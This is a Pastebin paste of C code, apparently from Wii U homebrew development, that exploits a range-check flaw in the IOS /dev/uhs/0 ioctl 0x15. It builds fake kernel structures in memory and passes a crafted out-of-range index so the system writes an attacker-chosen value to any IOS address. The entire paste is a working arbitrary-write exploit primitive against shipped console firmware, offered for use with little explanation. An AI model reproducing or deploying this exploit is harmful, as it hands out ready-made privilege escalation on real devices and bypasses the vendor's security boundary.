Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- /*
- * Exploits range check in /dev/uhs/0 Ioctl command 0x15
- *
- * Uses IOS commands from https://github.com/darksideos/darkside-kernel/blob/wiiu/bal/src/platform/wiiu/ios.c
- * ported for usage with HBL.
- */
- uint32_t ios_write32(int fd, uint32_t address, uint32_t value)
- {
- int opened = 0;
- if (fd == 0)
- {
- fd = IOS_Open("/dev/uhs/0", 10, 0);
- opened = 1;
- }
- uint32_t * buffer = (uint32_t *)OSAllocFromSystem(0x70, 0x10);
- for (int i = 0; i < 0x70/4; i++) buffer[i] = 0;
- // buf_0_m = (0x10146080 + 0x144 * buffer[0] + 0x39EC)
- // buffer[0] == 0xEDC7D670 => buf_0_m = 0x100002C
- // Corresponds to virtual address 0xF500002C.
- buffer[0] = 0xEDC7D670;
- buffer[1] = value;
- // Setup MEM1 for hax
- uint32_t MEMBASE = 0xF4000000;
- uint32_t * MEM1 = (uint32_t *)0xF500002C;
- uint32_t * TEMP = (uint32_t *)0xF5300000;
- MEM1[0x4E] = 0; // if ( buf_0_m[0x4E] )
- MEM1[0x21] = ((uint32_t)MEM1) - MEMBASE; // v11 = (_DWORD *)buf_0_m[0x21];
- MEM1[0x8] = ((uint32_t)TEMP) - MEMBASE; // v12 = v11[8]
- TEMP[5] = 1; // if ( v12[5] )
- TEMP[520] = address - 0x18; // *(_DWORD *)(v12[520] + 0x18) = buf_1;
- TEMP[33] = 0; // Guaranteed immediate return if !(*(_DWORD *)((v12+108) + 24)), or v12[33].
- DCFlushRange(MEM1, 0x1000);
- DCFlushRange(TEMP, 0x1000);
- DCFlushRange(buffer, 0x70);
- int ret = IOS_Ioctl(fd, 0x15, buffer, 0x70, NULL, 0);
- if (opened)
- {
- IOS_Close(fd);
- }
- // Small wait.
- int ctr = 0;
- for (int i = 0; i < 0x00500000; i++) ctr++;
- OSFreeToSystem(buffer);
- return ret;
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement